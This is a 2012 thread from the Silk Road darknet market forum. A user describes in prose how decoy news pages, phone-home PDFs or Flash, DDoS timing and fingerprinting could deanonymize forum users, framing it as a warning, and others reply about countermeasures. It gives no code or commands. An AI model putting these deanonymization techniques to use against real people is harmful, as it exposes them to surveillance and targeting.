Silk Road forums
Discussion => Security => Topic started by: kmfkewm on May 23, 2012, 02:24 am
-
A. Make a fake website that looks like a news website of some sort. I could just spider out a legitimate website and change the branding, and register a legit sounding domain name. The news article will be relevant to SR and will link to yet another URL that claims to have a .pdf that has leaked with information on SR. The PDF will phone home as soon as it is opened, and give a list of all of the IP addresses of those who opened it without proper countermeasures. The entire time I will be running a script to check the who is online section of the forum and who all has visited the thread versus the non Tor IP addresses seen downloading the PDF. Any found IP address can immediately be narrowed to the crowd size of users who viewed the thread, I could also attempt various strategies to narrow further on who the IP address belongs to, perhaps I could DDOS it on a few occasions while monitoring who is online and see if I can cause a pattern in knocking someone off of SR (this will be even easier to do if they happen to visit the SILC channel). Perhaps I can monitor if you continually browsed SR after viewing that thread or if you had a pause that is consistent with someone switching their focus to the news article and downloading and reading the fake PDF. The timing between when you view the thread and when you open the PDF will also be useful for narrowing in on you. Perhaps you are a vendor and I know where you ship from, and I can geoposition all of the non-tor IP addresses well enough to leave you as the only suspect ;).
B. Do the same thing as above but using a link to a flash video.
The moral of the story is make sure you protect yourself from these simple proxy bypass attacks, I am willing to bet that at least some people here open PDFs without having a fully isolated OS or being behind a transparent proxy or opening it in a restricted VM or having proper firewall rules or access controls. I also imagine several have flash enabled. I could probably also do the news thing and a lot of people would probably infact visit the article without even using Tor, I have seen several people here indicate that they use a different browser that isn't behind Tor to open clearnet links that they find on SR.
edit: Hm actually this would work better against a private forum since anonymous viewing is allowed here. That would make this attack less easy to carry out but not impossible, it would introduce some noise but probably wouldn't make it impossible to deanonymize at least some of the people who open the PDF (they would just need to be logged in when they go to the thread, although just intel on IP addresses could be useful if coupled with knowledge of vendors shipping locations). If I owned the SR server I could do some additional things as well, if any real IP addresses visit the news site I could compare their browser fingerprint to the browser fingerprints of SR users and attempt to further narrow the crowds based on this or find a correlation. I could also very quickly link IP addresses to pseudonyms with the DDOS / who is online monitoring technique, since I would quickly be able to see if any latency patterns arise in pseudonymous users streams after I DDOS the suspect IP address.
Ohhh I could also do that new remote website fingerprinting attack against the identified IP addresses over a long period of time, and compare the times they are detected as browsing SR forum to the who is online list and intersect the resulting crowds. That would probably be the best technique to link an IP address to its SR pseudonym. Of course you would need to not be taking proper countermeasures with PDFs first....but I bet that is true for many of you.
-
I'll be the first to say... Das fucked up.
-
I will be the first to say thank you once again
Personally I never ever open links from SR even via tor(overkill)
-
dont open any fucking pdfs
-
Been checking out the OVDB, some good shit in that section when you take the time to read into some of those threads
Saw some of your posts in there OP whilst reading
Some of it is pretty fucking detailed down that end of the board!!
-
so do it with malevolence
and raise awareness
harden the security culture of the community
-
The entire time I will be running a script to check the who is online section of the forum and who all has visited the thread versus the non Tor IP addresses seen downloading the PDF
Please excuse my ignorance. I honestly know very little about the inter-workings of hidden services (would SR considered to be a hidden serivce? Hidden services require 10 or more nodes from end-to-end, no?). Wouldn't all this information be useless if they applied an anonymizer/tumbler to thread views?
Honestly dude, I really don't know what i'm talking about, but would love to learn.
-
If someone was using a lap top and every time they accessed SR they went war driving and found an open network making sure all information coming from their computer was properly encrypted and their mac masked. what then?
-
If someone was using a lap top and every time they accessed SR they went war driving and found an open network making sure all information coming from their computer was properly encrypted and their mac masked. what then?
Then this attack wouldn't work, but it would still be possible to pwn them if an attacker with enough skills wanted to try. It would probably require a lot of resources though. Maybe exploit a browser zero day vulnerability and then geoposition with WPS, if you can control the police you could try and have them get to the target before their session ends. Not saying that it would be easy at all, but it would be firmly in the realm of possibility.
-
A. Make a fake website that looks like a news website of some sort. I could just spider out a legitimate website and change the branding, and register a legit sounding domain name. The news article will be relevant to SR and will link to yet another URL that claims to have a .pdf that has leaked with information on SR. The PDF will phone home as soon as it is opened, and give a list of all of the IP addresses of those who opened it without proper countermeasures. The entire time I will be running a script to check the who is online section of the forum and who all has visited the thread versus the non Tor IP addresses seen downloading the PDF. Any found IP address can immediately be narrowed to the crowd size of users who viewed the thread, I could also attempt various strategies to narrow further on who the IP address belongs to, perhaps I could DDOS it on a few occasions while monitoring who is online and see if I can cause a pattern in knocking someone off of SR (this will be even easier to do if they happen to visit the SILC channel). Perhaps I can monitor if you continually browsed SR after viewing that thread or if you had a pause that is consistent with someone switching their focus to the news article and downloading and reading the fake PDF. The timing between when you view the thread and when you open the PDF will also be useful for narrowing in on you. Perhaps you are a vendor and I know where you ship from, and I can geoposition all of the non-tor IP addresses well enough to leave you as the only suspect ;).
B. Do the same thing as above but using a link to a flash video.
The moral of the story is make sure you protect yourself from these simple proxy bypass attacks, I am willing to bet that at least some people here open PDFs without having a fully isolated OS or being behind a transparent proxy or opening it in a restricted VM or having proper firewall rules or access controls. I also imagine several have flash enabled. I could probably also do the news thing and a lot of people would probably infact visit the article without even using Tor, I have seen several people here indicate that they use a different browser that isn't behind Tor to open clearnet links that they find on SR.
edit: Hm actually this would work better against a private forum since anonymous viewing is allowed here. That would make this attack less easy to carry out but not impossible, it would introduce some noise but probably wouldn't make it impossible to deanonymize at least some of the people who open the PDF (they would just need to be logged in when they go to the thread, although just intel on IP addresses could be useful if coupled with knowledge of vendors shipping locations). If I owned the SR server I could do some additional things as well, if any real IP addresses visit the news site I could compare their browser fingerprint to the browser fingerprints of SR users and attempt to further narrow the crowds based on this or find a correlation. I could also very quickly link IP addresses to pseudonyms with the DDOS / who is online monitoring technique, since I would quickly be able to see if any latency patterns arise in pseudonymous users streams after I DDOS the suspect IP address.
Ohhh I could also do that new remote website fingerprinting attack against the identified IP addresses over a long period of time, and compare the times they are detected as browsing SR forum to the who is online list and intersect the resulting crowds. That would probably be the best technique to link an IP address to its SR pseudonym. Of course you would need to not be taking proper countermeasures with PDFs first....but I bet that is true for many of you.
Thanks for this - I like to upload books here occasionally and use the ePub formats rather than PDF because of Javascript exploits.
V.